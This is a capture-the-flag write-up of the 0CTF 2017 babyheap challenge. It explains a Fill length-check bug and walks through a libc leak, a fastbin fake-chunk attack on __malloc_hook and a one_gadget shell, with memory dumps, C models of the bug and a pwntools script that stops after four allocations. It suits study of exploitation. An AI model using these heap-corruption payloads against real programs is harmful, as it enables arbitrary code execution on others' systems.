Heap exploitation worked example: 0CTF 2017 babyheap

If the program receives no input for a while it prints "Alarm clock" and exits. This comes from sub_B70, which calls alarm(); NOP the call out while debugging.


The menu offers 5 commands.

Allocate: indices 0-15, so at most 16 chunks; the size is arbitrary up to 4096. The bookkeeping lives in a fixed memory region: every 3 qwords form one record, and the code walks the records checking whether the flag is 0 (index not yet in use). The first free record receives the new chunk's data; otherwise it moves on 3 qwords to the next record.

Memory is obtained with calloc. Unlike malloc, which leaves whatever garbage was previously in the block, calloc zeroes the block after allocating it.

After allocation the record's flag is set to 1 and the length and address are stored. The three qwords of a record are, in order, flag, size and address. For example, with slot 0 holding a 0x100-byte chunk at 0x5609ABC79010 and slot 1 a 0x20-byte chunk at 0x5609ABC79120:

000019E2F87FF280  01 00 00 00 00 00 00 00  00 01 00 00 00 00 00 00
000019E2F87FF290  10 90 C7 AB 09 56 00 00  01 00 00 00 00 00 00 00
000019E2F87FF2A0  20 00 00 00 00 00 00 00  20 91 C7 AB 09 56 00 00

Fill: takes an index, checks that the record's flag is 1 and only then continues; it then reads a length and the content. The input length is never compared with the size recorded for the chunk, so the content can be longer than the chunk:

sub_11B2(0x00005609ABC79120, 6)
{
    read(0, 0x00005609ABC79120, 6);
}
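To make the bug concrete, here is an added example (my own C model, not code from the challenge binary or the original write-up). It mimics the 16-slot table of (flag, size, pointer) records and a small heap laid out like glibc's (8-byte prev_size, 8-byte size field, then user data), then performs Fill both as the binary does it and with the missing length check. The heap is a static buffer with a bump allocator, not the real allocator, and a little-endian host is assumed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not the challenge's code: 16 records of
 * (flag, size, pointer) like babyheap's table, on top of a bump allocator
 * whose chunks carry glibc's 8-byte prev_size + 8-byte size header. */
#define NSLOTS  16
#define HEAP_SZ 0x1000

struct record {
    uint64_t in_use;   /* 1 once allocated, 0 when free */
    uint64_t size;     /* size passed to allocate */
    uint8_t *ptr;      /* user pointer = chunk + 0x10 */
};

struct heap {
    uint8_t mem[HEAP_SZ];
    size_t top;        /* offset of the next unused chunk */
    struct record tab[NSLOTS];
};

/* glibc's request2size() on 64-bit: add the 8-byte size field, round up
 * to 16, minimum 0x20. 0x48 and 0x40 both become 0x50, as in the dumps. */
static size_t chunk_size_for(size_t req) {
    size_t sz = (req + 8 + 15) & ~(size_t)15;
    return sz < 0x20 ? 0x20 : sz;
}

/* Size field of the chunk that owns user pointer p (8 bytes before it).
 * Read as a native integer; assumes a little-endian host like x86-64. */
static uint64_t size_field(const uint8_t *p) {
    uint64_t v;
    memcpy(&v, p - 8, sizeof v);
    return v;
}

/* Allocate: first slot with flag == 0, carve a chunk, zero the user data
 * (the binary uses calloc), record flag/size/pointer. Returns the slot. */
static int allocate(struct heap *h, size_t req) {
    if (req == 0 || req > 4096) return -1;
    for (int i = 0; i < NSLOTS; i++) {
        if (h->tab[i].in_use) continue;
        size_t csz = chunk_size_for(req);
        if (h->top + csz > HEAP_SZ) return -1;
        uint8_t *chunk = h->mem + h->top;
        uint64_t hdr = csz | 1;                  /* PREV_INUSE, like glibc */
        memcpy(chunk + 8, &hdr, sizeof hdr);
        memset(chunk + 16, 0, csz - 16);
        h->tab[i].in_use = 1;
        h->tab[i].size = req;
        h->tab[i].ptr = chunk + 16;
        h->top += csz;
        return i;
    }
    return -1;
}

/* Fill as the binary does it: only the flag is checked and the caller's
 * length is trusted, so len > tab[idx].size writes into the next chunk. */
static long fill_unchecked(struct heap *h, int idx, const uint8_t *src, size_t len) {
    if (idx < 0 || idx >= NSLOTS || h->tab[idx].in_use != 1) return -1;
    memcpy(h->tab[idx].ptr, src, len);
    return (long)len;
}

/* Hardened Fill: the same, but the length may not exceed the recorded size. */
static long fill_checked(struct heap *h, int idx, const uint8_t *src, size_t len) {
    if (idx < 0 || idx >= NSLOTS || h->tab[idx].in_use != 1) return -1;
    if (len > h->tab[idx].size) return -1;
    memcpy(h->tab[idx].ptr, src, len);
    return (long)len;
}

/* Step 2 of the walkthrough on the model heap: slot 0 (0x48) is followed by
 * slot 1 (0x40); 0x49 bytes into slot 0 reach slot 1's size field.
 * Returns slot 1's size field after the fill. */
static uint64_t overflow_demo(int use_checked) {
    static struct heap h;
    memset(&h, 0, sizeof h);
    int a = allocate(&h, 0x48);
    int b = allocate(&h, 0x40);
    uint8_t payload[0x49];                /* constructed: 0x48 zeros, then 0xa1 */
    memset(payload, 0, sizeof payload);
    payload[0x48] = 0xa1;
    if (use_checked) fill_checked(&h, a, payload, sizeof payload);
    else             fill_unchecked(&h, a, payload, sizeof payload);
    return size_field(h.tab[b].ptr);
}

int main(void) {
    printf("slot 1 size after unchecked Fill: 0x%llx\n", (unsigned long long)overflow_demo(0));
    printf("slot 1 size after checked Fill:   0x%llx\n", (unsigned long long)overflow_demo(1));
    return 0;
}
```

The unchecked version turns slot 1's size field from 0x51 into 0xa1, exactly the effect step 2 below shows in the real process; the checked version refuses the write and leaves 0x51 in place.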

Dump: first checks that the record's flag is 1, then writes out exactly the recorded size, so at most the whole chunk is printed and there is no out-of-bounds read:

sub_130F(0x00005609ABC79120, 0x20)
{
    write(1, 0x00005609ABC79120, 0x20);
}

Delete: checks that the flag is 1; if so it frees the address and then clears the flag, size and address stored in the record.

sub_B70: derives an address from /dev/urandom and uses it as the start of the array that stores the per-chunk records.

Summary: every operation first checks that the flag is 1, so a use-after-free is out of the question, and Delete is clean too. The only defect is that Fill does not compare the input length with the chunk's length, which gives a heap overflow.

Checking the binary's mitigations with checksec (screenshot omitted):

Every mitigation is enabled, including Full RELRO, so the GOT is read-only.

Exploitation plan:

1. First leak the libc base. A chunk in the unsorted bin has fd and bk pointing at the bin head, main_arena+88, from which the libc base can be computed.

2. With the libc base in hand, use the heap overflow in Fill to modify a freed fastbin chunk's fd so that a chunk gets allocated just before __malloc_hook, and then overwrite __malloc_hook.

3. Write a one_gadget address into __malloc_hook and trigger it. Overwriting the GOT as usual is not possible this time because Full RELRO is on. A one_gadget is an address inside libc which, provided a few register or stack constraints hold, executes execve("/bin/sh", ...) directly. Typically one_gadget addresses are used to hijack a GOT entry, a return address or a hook (__malloc_hook, __free_hook): a shortcut for whatever location you can overwrite once you control the flow.

The concrete procedure follows, with detailed dumps for every step so that beginners like me can follow the flow:

1. First create four chunks (user address and chunk size field in the comments):

allocate(0x48)  # 0, a010, size field 0x51
allocate(0x40)  # 1, a060, 0x51
allocate(0x40)  # 2, a0b0, 0x51
allocate(0x40)  # 3, a100, 0x51

The table now stores each chunk's record:

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00


2. Overflow from chunk 0 into chunk 1's header so that chunk 1's size field becomes 0xa1. Chunk 0 has 0x48 bytes of user data, so the 0x49th byte lands on the low byte of chunk 1's size field at a058:

update(0, 0x49, '\x00'*0x48 + '\xa1')

Before:

000055C71CE7A000  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A050  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00

After:

000055C71CE7A000  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A050  00 00 00 00 00 00 00 00  A1 00 00 00 00 00 00 00


3. Delete chunk 1 so that it is placed in the unsorted bin:

delete(1)  # a060, chunk 1 goes into the unsorted bin

Q: Why does it go into the unsorted bin?

A: A freed chunk whose size exceeds the fastbin limit get_max_fast() (0x80 by default on 64-bit glibc; chunk 1's size is now 0xa0) is not a fastbin chunk. Unless it borders the top chunk or a free neighbour it is first put into the unsorted bin (there is only one, bins[1]). With the fake size 0xa0 the "next" chunk is chunk 3's header at a0f0, which is in use, so nothing is consolidated. On the next allocation, if the fastbins cannot satisfy the request, malloc looks in the unsorted bin first.

Before the delete:

000055C71CE7A050  00 00 00 00 00 00 00 00  A1 00 00 00 00 00 00 00
000055C71CE7A060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

After the delete (fd and bk now hold the unsorted bin head, main_arena+88):

000055C71CE7A050  00 00 00 00 00 00 00 00  A1 00 00 00 00 00 00 00
000055C71CE7A060  B8 B7 EE 38 0A 7F 00 00  B8 B7 EE 38 0A 7F 00 00
000055C71CE7A070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


4. Request a 0x40 chunk so that the unsorted chunk is split and its remainder, which is chunk 2's memory, is left in the unsorted bin:

allocate(0x40)  # a060; the remainder at a0b0 is in the unsorted bin while slot 2 still has flag == 1

Q: How did the unsorted bin move from chunk 1 to chunk 2?

A: A 0x40 request needs a 0x50 chunk. The fastbins and the 0x50 small bin are empty, so malloc walks the unsorted bin. The 0xa0 chunk is not an exact fit, so it is sorted into its own bin; malloc then scans the bins for the next-largest free chunk, finds this one, carves the first 0x50 bytes off as the new chunk 1 (a060) and puts the 0x50 remainder (chunk a0a0, user data a0b0) back into the unsorted bin with fd and bk pointing at the bin head. Slot 2 still records flag = 1 and the pointer a0b0, so Dump(2) can read those pointers.

The table is unchanged:

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00

The heap (chunk 1's size is 0x51 again, the remainder at a0a0 carries the bin pointers):

000055C71CE7A050  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  B8 B7 EE 38 0A 7F 00 00  B8 B7 EE 38 0A 7F 00 00
000055C71CE7A0C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

5. Dump the chunk sitting in the unsorted bin and leak the libc base:

view(2)  # a0b0

main_arena+88 = 0x7F0A38EEB7B8

libc_base = 0x7F0A38EEB7B8 - 88 - 0x3c2760 = 0x7F0A38B29000

Note: 0x3c2760 is the offset of main_arena inside libc. main_arena is not an exported symbol, so it was located by looking at the malloc_trim function in libc.so, which references it directly. The value differs for every libc build and has to be determined for the one in use: 0x3c2760 is for libc-2.19.so in my Ubuntu 14.04 64-bit debugging environment, whereas for the libc.so.6 shipped with the challenge it is 0x3c4b20.

6. Create chunk 4, which takes the remainder out of the unsorted bin (same memory as slot 2):

allocate(0x40)  # 4, a0b0: clears the unsorted bin, aliases slot 2

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  00 00 00 00 00 00 00 00

calloc zeroed the bin pointers:

000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


7. Fill chunk 4:

update(4, 0x40, 'a'*0x40)  # a0b0

000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0C0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0D0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0E0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0F0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

000055C71CE7A100? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00


8. Fill chunk 2, which is the same memory as chunk 4, so the first 0x10 bytes of chunk 4 are overwritten:

update(2, 0x10, 'b'*0x10)  # a0b0

000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62
000055C71CE7A0C0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0D0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0E0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0F0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


9. Create chunk 5 with a 0x60 request (chunk size 0x70):

allocate(0x60)  # 5, a150

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E90  60 00 00 00 00 00 00 00  50 A1 E7 1C C7 55 00 00

000055C71CE7A140  00 00 00 00 00 00 00 00  71 00 00 00 00 00 00 00
000055C71CE7A150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A1A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


10. Delete chunk 5 so that the 0x70 fastbin points at it:

delete(5)  # a150; after the delete, fastbin[0x70] -> chunk 5

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  00 00 00 00 00 00 00 00
000024B519199E90  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


11. Pick a suitable address as fake_chunk and overflow from chunk 3 into chunk 5's header so that chunk 5's fd points at fake_chunk:

fake_chunk = leak_addr - 88 - 0x2b - 8 = 0x7F0A38EEB7B8 - 88 - 0x2b - 8 = 0x7F0A38EEB72D

payload = 'a'*0x40 + p64(0) + p64(0x70) + p64(fake_chunk)

update(3, len(payload), payload)  # a100

The 0x40 'a's fill chunk 3's own data; the next two qwords rewrite chunk 5's prev_size (0) and size (0x70, so it remains a valid 0x70 fastbin chunk), and the last qword is chunk 5's fd.

Q: Why choose 0x7F0A38EEB72D as fake_chunk? The fd written in a fastbin attack has to meet a condition; it cannot be arbitrary.

A: Because 0x7F0A38EEB72D + 8 is where the fake chunk's size field sits, and the 8-byte value read from there happens to be 0x7f. We have to look upward from __malloc_hook for a spot where a misaligned read yields a legal size field. 0x7f gives index 5 in fastbin_index(), i.e. the bin for 0x70-byte chunks (the low three bits are flag bits and are masked off).

Q: Why must it be the 0x70 bin?

A: Because delete(5) put chunk 5 into the 0x70 fastbin. malloc only returns the chunk that chunk 5's fd points to if that chunk's size field maps to the same fastbin, so the fake size above __malloc_hook must read as 0x70 plus flag bits. Through chunk 5's fd the singly linked fastbin list becomes chunk 5 -> fake_chunk.

Byte misalignment: the trick is to read memory at an unaligned offset so that a qualifying size value falls out, and then have a chunk allocated at that spot. It is mostly used when the GOT cannot be modified.

For example (the addresses in this paragraph come from a different run than the dumps above), the 8 bytes starting at 0x7fd7a4da9af5 yield a 0x7f, which as a size is 0x70 and fits our fastbin. So 0x7fd7a4da9af5 - 8 becomes the start of the fake chunk and is written into some chunk's fd.

Principle: for a fastbin chunk reached through fd, malloc only checks that its size field belongs to the same fastbin. So as long as a suitable size byte exists near the address we want to write, malloc can be made to return that location.

Given such an address A (the byte that will act as the size field), the fake chunk starts at A - 8 (its prev_size), its user data starts at A + 8, and the fd written into the freed chunk is A - 8.

The size to request from allocate is the fake chunk size minus 0x10, i.e. the user-data size malloc returns: 0x70 - 0x10 = 0x60.

After the overflow, chunk 5's fd points at 0x7F0A38EEB72D:

000055C71CE7A0F0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A100  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A110  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A120  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A130  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A140  00 00 00 00 00 00 00 00  70 00 00 00 00 00 00 00
000055C71CE7A150  2D B7 EE 38 0A 7F 00 00  00 00 00 00 00 00 00 00
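As an added example (my own code, not part of the original write-up or the challenge), the C program below emulates the single check that glibc 2.23's _int_malloc() applies to a chunk taken from a fastbin and scans a constructed image of the bytes below __malloc_hook for a misaligned size field that passes it, which is exactly the search step 11 describes. The image mirrors the glibc 2.23 layout (libc pointers with a 0x7f high byte at __malloc_hook-0x20, -0x10 and -0x08, a zero qword at -0x18); the pointer values and the hook address are made up. Caveat: glibc 2.32 and later reject misaligned fastbin chunks and mangle fd with safe-linking, so the trick is specific to older libcs.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the challenge or the write-up: the check glibc
 * 2.23's _int_malloc() applies to a chunk popped from a fastbin, plus a
 * scanner for a misaligned size field below __malloc_hook that passes it.
 * Assumes 64-bit glibc constants (SIZE_SZ 8, SIZE_BITS 7). */

/* fastbin_index() from malloc.c, 64-bit: (size >> 4) - 2 */
static size_t fastbin_index(size_t sz) { return (sz >> 4) - 2; }

/* chunksize(): strip PREV_INUSE / IS_MMAPPED / NON_MAIN_ARENA */
static size_t chunksize(uint64_t size_field) { return (size_t)(size_field & ~(uint64_t)7); }

/* malloc's check: the victim's size must map to the same fastbin as the
 * request (nb is the rounded chunk size, 0x70 for a 0x60 request), otherwise
 * "malloc(): memory corruption (fast)". 2.23 has no alignment check. */
static int fastbin_victim_ok(uint64_t victim_size_field, size_t nb) {
    return fastbin_index(chunksize(victim_size_field)) == fastbin_index(nb);
}

/* Little-endian helpers so the image does not depend on host byte order. */
static void put_le64(uint8_t *dst, uint64_t v) {
    for (int i = 0; i < 8; i++) dst[i] = (uint8_t)(v >> (8 * i));
}
static uint64_t get_le64(const uint8_t *src) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | src[i];
    return v;
}

/* Scan an image of memory starting at address `base`: treat every byte offset
 * as a possible size field and return the chunk address (size field - 8) of
 * the first one malloc would accept for a request of chunk size nb; 0 if none. */
static uint64_t find_fake_fastbin_chunk(const uint8_t *img, size_t len, uint64_t base, size_t nb) {
    for (size_t off = 0; off + 8 <= len; off++) {
        if (fastbin_victim_ok(get_le64(img + off), nb))
            return base + off - 8;
    }
    return 0;
}

/* Constructed image of the 0x38 bytes from __malloc_hook - 0x30 through the
 * hook, modelled on glibc 2.23: libc pointers (high byte 0x7f) at -0x20,
 * -0x10 and -0x08, zero at -0x18 and in the hook itself. The pointer values
 * are made up; only their 0x7f byte matters. */
static uint64_t demo_fake_chunk(uint64_t malloc_hook) {
    uint8_t img[0x38];
    memset(img, 0, sizeof img);
    put_le64(img + 0x10, 0x00007f0a38bacf60ull);   /* hook - 0x20 */
    put_le64(img + 0x20, 0x00007f0a38bace20ull);   /* hook - 0x10, __memalign_hook */
    put_le64(img + 0x28, 0x00007f0a38baca00ull);   /* hook - 0x08, __realloc_hook */
    return find_fake_fastbin_chunk(img, sizeof img, malloc_hook - 0x30, 0x70);
}

/* Bytes a Fill into the fake chunk's user data (fake + 0x10) has to skip
 * before it reaches __malloc_hook. */
static uint64_t padding_to_hook(uint64_t fake_chunk, uint64_t malloc_hook) {
    return malloc_hook - (fake_chunk + 0x10);
}

int main(void) {
    uint64_t hook = 0x00007f0a38eeb740ull;          /* made-up __malloc_hook address */
    uint64_t fake = demo_fake_chunk(hook);
    printf("__malloc_hook  = %#llx\n", (unsigned long long)hook);
    printf("fake chunk     = %#llx (hook - %#llx)\n", (unsigned long long)fake,
           (unsigned long long)(hook - fake));
    printf("padding needed = %#llx\n", (unsigned long long)padding_to_hook(fake, hook));
    return 0;
}
```

On this 2.23-style image the first acceptable size field is the 0x7f byte of the pointer at __malloc_hook-0x20, read from __malloc_hook-0x1b, so the fake chunk lands at __malloc_hook-0x23 and a Fill into it needs 0x13 bytes of padding before the hook. The scanner makes the dependency on the libc layout explicit: with a different arrangement of pointers below the hook (as in the 2.19 environment used for the dumps above) the offset and the padding change.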


12. Allocate again: malloc hands back the address chunk 5 had before it was deleted, and the fastbin head now points at fake_chunk:

allocate(0x60)  # a150, slot 5 again

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E90  60 00 00 00 00 00 00 00  50 A1 E7 1C C7 55 00 00

000055C71CE7A140  00 00 00 00 00 00 00 00  70 00 00 00 00 00 00 00
000055C71CE7A150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A1A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


13. Create chunk 6; it is returned at the forged fake_chunk + 0x10 = 0x00007F0A38EEB73D:

allocate(0x60)  # 6, fake_chunk

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E90  60 00 00 00 00 00 00 00  50 A1 E7 1C C7 55 00 00
000024B519199EA0  01 00 00 00 00 00 00 00  60 00 00 00 00 00 00 00
000024B519199EB0  3D B7 EE 38 0A 7F 00 00  00 00 00 00 00 00 00 00


14. Fill chunk 6 so that __malloc_hook ends up holding the one_gadget address:

update(6, 0x3+8, 'c'*0x3 + p64(one_gadget))  # afterwards __malloc_hook holds the one_gadget address

0x00007F0A38EEB73D is 3 bytes before __malloc_hook:

libc_2.19.so:00007F0A38EEB73D  db 0
libc_2.19.so:00007F0A38EEB73E  db 0
libc_2.19.so:00007F0A38EEB73F  db 0
libc_2.19.so:00007F0A38EEB740  __malloc_hook db 0
libc_2.19.so:00007F0A38EEB741  db 0
libc_2.19.so:00007F0A38EEB742  db 0
libc_2.19.so:00007F0A38EEB743  db 0
libc_2.19.so:00007F0A38EEB744  db 0
libc_2.19.so:00007F0A38EEB745  db 0

A note on the padding: in this libc-2.19 debugging environment __malloc_hook (0x7F0A38EEB740) lies 0x20 below main_arena (0x7F0A38EEB760), so fake_chunk + 0x10 is 3 bytes before the hook. In the challenge's libc.so.6 __malloc_hook is at main_arena - 0x10 (offset 0x3c4b10 against main_arena at 0x3c4b20), so the same fake_chunk formula leaves 0x13 bytes before the hook; that is why the full exploit below pads with 0x13 bytes instead of 3.

Running one_gadget on the libc lists 4 usable addresses; here we pick 0x4647c.

one_gadget = libc_base + 0x4647c = 0x7F0A38B29000 + 0x4647c = 0x7F0A38B6F47C

After the Fill, __malloc_hook holds the one_gadget address 0x7F0A38B6F47C:

00007F0A38EEB730  60 CF BA 38 0A 7F 00 00  00 00 00 00 00 63 63 63
00007F0A38EEB740  7C F4 B6 38 0A 7F 00 00  00 00 00 00 00 00 00 00


15. The next calloc calls the function stored in __malloc_hook, 0x7F0A38B6F47C, which executes execve("/bin/sh", rsp+0x30, environ). Any size will do, since calloc consults the hook before allocating anything:

allocate(0x10)


Full exploit (targets the challenge's libc.so.6, hence the 0x3c4b20, 0x4526a and 0x13 constants; ported to Python 3 pwntools, so all payloads are bytes):

from pwn import *

context.log_level = 'debug'

cn = process('./babyheap')
elf = ELF('./babyheap')
libc = ELF('./libc.so.6')

# helpers; the menu reads decimal numbers as text, so ints are sent as str
def sl(data):
    if isinstance(data, int):
        data = str(data).encode()
    elif isinstance(data, str):
        data = data.encode()
    cn.sendline(data)

r    = lambda numb=4096: cn.recv(numb)
ru   = lambda delims: cn.recvuntil(delims)
irt  = lambda: cn.interactive()
uu64 = lambda data: u64(data.ljust(8, b'\0'))

def allocate(size):
    ru(b'Command: ')
    sl(1)
    ru(b'Size: ')
    sl(size)

def update(index, size, content):
    ru(b'Command: ')
    sl(2)
    ru(b'Index: ')
    sl(index)
    ru(b'Size: ')
    sl(size)
    ru(b'Content: ')
    sl(content)

def delete(index):
    ru(b'Command: ')
    sl(3)
    ru(b'Index: ')
    sl(index)

def view(index):
    ru(b'Command: ')
    sl(4)
    ru(b'Index: ')
    sl(index)

allocate(0x48)  # 0
allocate(0x40)  # 1
allocate(0x40)  # 2
allocate(0x40)  # 3

